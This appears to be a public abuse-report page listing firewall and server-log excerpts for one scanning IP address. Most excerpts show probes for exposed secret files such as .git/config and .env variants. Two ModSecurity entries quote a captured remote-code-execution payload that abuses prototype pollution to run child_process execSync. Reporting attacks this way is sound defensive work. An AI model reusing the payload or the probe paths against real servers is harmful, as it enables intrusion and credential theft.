๐ฉ๐ช
lolyay
2026-10-09 23:35:29
(13 hours ago)
34.4.25.189 - - [09/Oct/2026:23:35:28 +0000] "GET /.git/config HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X ...
show more
34.4.25.189 - - [09/Oct/2026:23:35:28 +0000] "GET /.git/config HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.4.25.189 - - [09/Oct/2026:23:35:28 +0000] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
...
show less
Web App Attack
Bad Web Bot
๐ฉ๐ช
Blexyel
2026-10-09 19:56:52
(16 hours ago)
34.4.25.189 - - [09/Oct/2026:21:56:52 +0200] "GET /.git/config HTTP/1.1" 404 120 "-" "Mozilla/5.0 (M ...
show more
34.4.25.189 - - [09/Oct/2026:21:56:52 +0200] "GET /.git/config HTTP/1.1" 404 120 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
...
show less
Brute-Force
Web App Attack
๐ฉ๐ช
4server
2026-10-09 18:16:15
(18 hours ago)
[FriOct0920:16:10.1304602026][security2:error][pid4168888:tid4169001][client34.4.25.189:0]ModSecurit ...
show more
[FriOct0920:16:10.1304602026][security2:error][pid4168888:tid4169001][client34.4.25.189:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\*\\\\\\\\\)\|.\*\)\\\\\\\\\)\|\\\\\\\\{.\*\\\\\\\\}\)\|[\<\>]\\\\\\\\\(.\*\\\\\\\\\)\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\$\(\(41\*271\)\)foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require\(child_process\).execsync\(echo\$\(\(41\*271\)\)\|base64-w0\).tostring\(\).trim\(\)throwobject.assign\(newerror\(next_redirect\){digest:\`next_redirectpush/login\?a=\${res}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}\"][tag\"attack-rce\"][hostname\"autodiscover.creazione-siti-web-ticino.ch\"][uri\"/\"][unique_id\"askvah4c4pzptQRhcduJewAAANA\"
show less
Port Scan
Brute-Force
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-10-09 12:40:58
(1 day ago)
(mod_security) mod_security (id:210492) triggered by 34.4.25.189 (189.25.4.34.bc.googleusercontent.c ...
show more
(mod_security) mod_security (id:210492) triggered by 34.4.25.189 (189.25.4.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Oct 09 08:40:51.222841 2026] [security2:error] [pid 5360:tid 5385] [client 34.4.25.189:34992] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.cookmanufacturinggroup.com"] [uri "/.git/config"] [unique_id "asjg00w2saE0XYov-rEBSwAAANc"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
Rocky Mountain Bioengineering Symposium
2026-10-09 12:07:33
(1 day ago)
[Fri Oct 09 06:07:26.003240 2026] [authz_core:error] [pid 342994:tid 140266149230144] [client 34.4.2 ...
show more
[Fri Oct 09 06:07:26.003240 2026] [authz_core:error] [pid 342994:tid 140266149230144] [client 34.4.25.189:41494] AH01630: client denied by server configuration: /var/www/horde/.env.bak
[Fri Oct 09 06:07:32.146296 2026] [authz_core:error] [pid 342994:tid 140267491407424] [client 34.4.25.189:41494] AH01630: client denied by server configuration: /var/www/horde/.env.dist
[Fri Oct 09 06:07:32.549096 2026] [authz_core:error] [pid 342994:tid 140265922692672] [client 34.4.25.189:41494] AH01630: client denied by server configuration: /var/www/horde/.env.swp
...
show less
Bad Web Bot
๐ซ๐ท
Catalin Negru
2026-10-09 07:29:24
(1 day ago)
Recidive ban by fail2ban on server.blackbit.ro
Brute-Force
๐บ๐ธ
TPI-Abuse
2026-10-09 03:03:33
(1 day ago)
(mod_security) mod_security (id:210492) triggered by 34.4.25.189 (189.25.4.34.bc.googleusercontent.c ...
show more
(mod_security) mod_security (id:210492) triggered by 34.4.25.189 (189.25.4.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Oct 08 23:03:27.482842 2026] [security2:error] [pid 25936:tid 25936] [client 34.4.25.189:0] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.cloudex.click"] [uri "/.git/config"] [unique_id "ashZf2SwUj7euXpsNYRKcAAAABI"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ท๐ด
clauss
2026-10-09 00:33:33
(1 day ago)
34.4.25.189 - - [09/Oct/2026:03:33:31 +0300] "GET /.git/config HTTP/1.1" 400 63 "-" "Mozilla/5.0 (X1 ...
show more
34.4.25.189 - - [09/Oct/2026:03:33:31 +0300] "GET /.git/config HTTP/1.1" 400 63 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.4.25.189 - - [09/Oct/2026:03:33:32 +0300] "GET /.env.local HTTP/1.1" 400 52 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
...
show less
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-10-08 22:53:16
(1 day ago)
(mod_security) mod_security (id:210492) triggered by 34.4.25.189 (189.25.4.34.bc.googleusercontent.c ...
show more
(mod_security) mod_security (id:210492) triggered by 34.4.25.189 (189.25.4.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Oct 08 18:53:12.620576 2026] [security2:error] [pid 11329:tid 11329] [client 34.4.25.189:46520] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.cityviewsportsbar.com"] [uri "/.git/config"] [unique_id "asge2Hq_5IvVj-lUwwP_0QAAAAw"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ซ๐ท
phoenix1jl96
2026-10-08 16:37:35
(1 day ago)
2026/10/08 18:37:34 [error] 4800#4800: *48034 open() "/home/user-data/www/default/mailer/.env" faile ...
show more
2026/10/08 18:37:34 [error] 4800#4800: *48034 open() "/home/user-data/www/default/mailer/.env" failed (2: No such file or directory), client: 34.4.25.189, server: autodiscover.chat.ledemon.us, request: "GET /mailer/.env HTTP/1.1", host: "autodiscover.chat.ledemon.us"
2026/10/08 18:37:35 [error] 4800#4800: *48034 open() "/usr/local/lib/roundcubemail/.env" failed (2: No such file or directory), client: 34.4.25.189, server: autodiscover.chat.ledemon.us, request: "GET /mail/.env HTTP/1.1", host: "autodiscover.chat.ledemon.us"
...
show less
DNS Compromise
DNS Poisoning
DDoS Attack
Ping of Death
Web Spam
Email Spam
Blog Spam
Port Scan
Hacking
Brute-Force
Bad Web Bot
SSH
Web App Attack
๐ฉ๐ช
Dominik Lysiak
2026-10-08 02:14:50
(2 days ago)
34.4.25.189 - - [08/Oct/2026:04:14:49 +0200] "GET /.git/config HTTP/1.1" 404 178 "-" "Mozilla/5.0 (X ...
show more
34.4.25.189 - - [08/Oct/2026:04:14:49 +0200] "GET /.git/config HTTP/1.1" 404 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.4.25.189 - - [08/Oct/2026:04:14:49 +0200] "GET /.git/config HTTP/1.1" 404 178 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.4.25.189 - - [08/Oct/2026:04:14:49 +0200] "GET /.env HTTP/1.1" 404 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
...
show less
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-10-07 20:23:37
(2 days ago)
(mod_security) mod_security (id:210492) triggered by 34.4.25.189 (189.25.4.34.bc.googleusercontent.c ...
show more
(mod_security) mod_security (id:210492) triggered by 34.4.25.189 (189.25.4.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Oct 07 16:23:30.755576 2026] [security2:error] [pid 9830:tid 9830] [client 34.4.25.189:39118] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.butterflymornings.com"] [uri "/.git/config"] [unique_id "asaqQvx7N-hszsEI-hcfuAAAABE"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ฉ๐ช
4server
2026-10-07 18:50:08
(2 days ago)
[WedOct0720:50:05.3722402026][security2:error][pid1288012:tid1288105][client34.4.25.189:0]ModSecurit ...
show more
[WedOct0720:50:05.3722402026][security2:error][pid1288012:tid1288105][client34.4.25.189:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\*\\\\\\\\\)\|.\*\)\\\\\\\\\)\|\\\\\\\\{.\*\\\\\\\\}\)\|[\<\>]\\\\\\\\\(.\*\\\\\\\\\)\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\$\(\(41\*271\)\)foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require\(child_process\).execsync\(echo\$\(\(41\*271\)\)\|base64-w0\).tostring\(\).trim\(\)throwobject.assign\(newerror\(next_redirect\){digest:\`next_redirectpush/login\?a=\${res}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}\"][tag\"attack-rce\"][hostname\"autodiscover.buletti-panettoni.ch\"][uri\"/\"][unique_id\"asaUXXvPIAj9eLv0VVA-pAAAAYE\"]
show less
Port Scan
Brute-Force
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-10-07 14:07:21
(2 days ago)
(mod_security) mod_security (id:210492) triggered by 34.4.25.189 (189.25.4.34.bc.googleusercontent.c ...
show more
(mod_security) mod_security (id:210492) triggered by 34.4.25.189 (189.25.4.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Oct 07 10:07:15.453884 2026] [security2:error] [pid 28248:tid 28248] [client 34.4.25.189:47644] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.bridalshowerinvitationsonline.com"] [uri "/.git/config"] [unique_id "asZSEwq5_xx7qwtkKnTR_QAAAAg"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-10-07 11:47:49
(3 days ago)
(mod_security) mod_security (id:210492) triggered by 34.4.25.189 (189.25.4.34.bc.googleusercontent.c ...
show more
(mod_security) mod_security (id:210492) triggered by 34.4.25.189 (189.25.4.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Oct 07 07:47:42.107994 2026] [security2:error] [pid 5642:tid 5642] [client 34.4.25.189:48920] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.bradleybarefoot.com"] [uri "/.git/config"] [unique_id "asYxXh35afYGBQXGGJCcugAAAAc"]
show less
Brute-Force
Bad Web Bot
Web App Attack